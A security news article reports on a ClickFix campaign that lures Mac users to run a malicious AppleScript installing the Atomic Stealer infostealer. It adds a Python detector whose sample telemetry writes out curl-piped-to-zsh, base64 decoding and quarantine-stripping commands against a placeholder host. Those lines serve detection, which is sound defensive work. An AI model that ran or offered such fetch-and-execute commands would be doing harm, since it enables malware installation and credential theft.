"ClickFix" attacks on macOS now also via Script Editor
An ongoing malware campaign is using Apple's Script Editor instead of the Terminal to get the Atomic Stealer infostealer onto Macs.
Website impersonating Apple: No, you can't free up space on your Mac like this.
(Image: Jamf)
Security researchers from MDM specialist Jamf have discovered a new variant of the so-called ClickFix attack technique, which tricks users into executing commands on their Mac that then install malware. The new distribution method of the well-known data thief Atomic Stealer appears to be optimized to bypass a new protection in macOS Terminal that Apple introduced with macOS 26.4. This is intended to prevent problematic code from being executed so easily.
As Jamf Threat Labs writes in an analysis, attackers lure their victims to a fake Apple website that pretends to help free up storage space on the Mac. An “Execute” button on the page then calls the applescript:// URL scheme. The browser then asks the user for permission to open Script Editor – an action the victim might confirm without suspicion.
From URL Scheme to Data Thief
What is actually new about the method is the use of the applescript:// URL scheme: when it is called, Script Editor opens with a malicious AppleScript supplied by the website. Once the user runs it, the script executes an obfuscated command chain. First, a payload is fetched from an external server with curl, decoded, and piped into zsh. A second stage decodes further code via Base64 and gunzip and finally downloads the actual malware, a Mach-O binary of Atomic Stealer, to /tmp, strips the file's extended attributes (including the quarantine flag that Gatekeeper's checks depend on), and makes it executable.
What is interesting is that the installation chain bypasses the Terminal paste protection in macOS 26.4. Apple introduced it to warn users about ClickFix attacks when they paste manipulated commands into the Terminal, although the warning does not always trigger. By switching to Script Editor, this mechanism is apparently circumvented, according to Jamf. The user must still click the play button in Script Editor to run the malware, however; the fake Apple page tells the victim to do exactly that.
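As an added illustration of how a defender might spot the chain described above in process telemetry (this is example code written for this article, not Jamf's or Apple's), the following Python script scores process-execution events per host. It assumes a simplified, constructed JSON-lines event format with host, parent, image and argv fields; the sample events, the example.invalid domain, the /tmp/update path and the scoring weights are all constructed for the demonstration, and a real deployment would map Endpoint Security or unified-log process events onto the same fields.

```python
"""Heuristic detector for the Script Editor ClickFix chain described above.

Added example, not code from Jamf or Apple. Input is a constructed, simplified
JSON-lines process-event format (fields: host, parent, image, argv); a real
deployment would map Endpoint Security or unified-log process events onto it.
"""
import json
import re
from dataclasses import dataclass, field

# Stages of the chain from the article, weighted; each counts once per host.
STAGE_WEIGHTS = {
    "script_editor_spawned_shell": 3,  # Script Editor -> sh/zsh (do shell script)
    "curl_piped_to_shell": 2,          # curl ... | ... | zsh
    "staged_decode": 1,                # base64 -d / gunzip in the pipeline
    "tmp_xattr_strip": 3,              # xattr -c or -d com.apple.quarantine on /tmp/...
    "tmp_chmod_exec": 2,               # chmod +x on /tmp/...
}
ALERT_THRESHOLD = 6  # assumed tuning value, not from the article

SHELLS = {"sh", "zsh", "bash", "osascript"}
CURL_PIPE_RE = re.compile(r"\bcurl\b.*\|\s*(?:zsh|bash|sh)\b")
DECODE_RE = re.compile(r"\b(?:base64\s+-(?:d|D|-decode)|gunzip|gzip\s+-d)\b")
TMP = r"(?:\S+\s+)*/(?:private/)?tmp/\S+"
XATTR_RE = re.compile(r"\bxattr\s+(?:-c|-d\s+com\.apple\.quarantine)\s+" + TMP)
CHMOD_RE = re.compile(r"\bchmod\s+(?:\S+\s+)*?(?:\+x|[0-7]{3,4})\s+" + TMP)


@dataclass
class Finding:
    host: str
    score: int = 0
    stages: set = field(default_factory=set)

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def parse_events(lines):
    """Parse JSON-lines events, skipping malformed or incomplete records."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(ev, dict) and {"host", "parent", "image", "argv"}.issubset(ev):
            events.append(ev)
    return events


def stages_for_event(ev):
    """Return the chain stages that one process event evidences."""
    hit = set()
    cl = " ".join(ev["argv"])
    if ev["parent"] == "Script Editor" and ev["image"] in SHELLS:
        hit.add("script_editor_spawned_shell")
    if CURL_PIPE_RE.search(cl):
        hit.add("curl_piped_to_shell")
    if DECODE_RE.search(cl):
        hit.add("staged_decode")
    if XATTR_RE.search(cl):
        hit.add("tmp_xattr_strip")
    if CHMOD_RE.search(cl):
        hit.add("tmp_chmod_exec")
    return hit


def score_hosts(lines):
    """Aggregate per-host findings; a stage adds its weight only the first time it is seen."""
    findings = {}
    for ev in parse_events(lines):
        f = findings.setdefault(ev["host"], Finding(ev["host"]))
        for stage in stages_for_event(ev) - f.stages:
            f.stages.add(stage)
            f.score += STAGE_WEIGHTS[stage]
    return findings


# Constructed sample telemetry: mac-01 shows the full chain (domain and paths are
# placeholders); mac-02 is a developer clearing attributes on a build in /tmp
# from Terminal, which should stay below the threshold.
SAMPLE_EVENTS = [
    '{"host":"mac-01","parent":"Script Editor","image":"sh","argv":["sh","-c","curl -fsSL https://example.invalid/s1 | base64 -d | zsh"]}',
    '{"host":"mac-01","parent":"sh","image":"curl","argv":["curl","-fsSL","https://example.invalid/s1"]}',
    '{"host":"mac-01","parent":"zsh","image":"sh","argv":["sh","-c","echo H4sIAAAA | base64 -d | gunzip | zsh"]}',
    '{"host":"mac-01","parent":"zsh","image":"xattr","argv":["xattr","-c","/tmp/update"]}',
    '{"host":"mac-01","parent":"zsh","image":"chmod","argv":["chmod","+x","/tmp/update"]}',
    '{"host":"mac-02","parent":"Terminal","image":"zsh","argv":["zsh","-lc","xattr -c /tmp/build/app"]}',
    'not json at all',
    '{"host":"mac-03","image":"sh"}',
]

if __name__ == "__main__":
    for host, f in score_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: score={f.score} alert={f.alert} stages={sorted(f.stages)}")
```

The weighting deliberately keeps any single stage below the threshold: stripping quarantine attributes in /tmp or piping curl into a shell is common enough on developer machines, but Script Editor spawning a shell that does both, followed by chmod +x on the same staging directory, is the combination the article describes and is what raises the alert.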
What Atomic Stealer Steals
Atomic Stealer is an infostealer that has been active since 2023 and is marketed to criminals via Telegram, among other channels. It steals keychain passwords, browser data such as autofill entries, cookies and credit card numbers, and crypto wallets, among other things. Files from the Desktop and Documents folders can also be exfiltrated.
Using Script Editor to distribute malware is not new in itself, but distribution via applescript:// links is. Users should never confirm a website's request to open Script Editor. Apple has not yet responded to the new method; it should be relatively easy to prevent.
(bsc)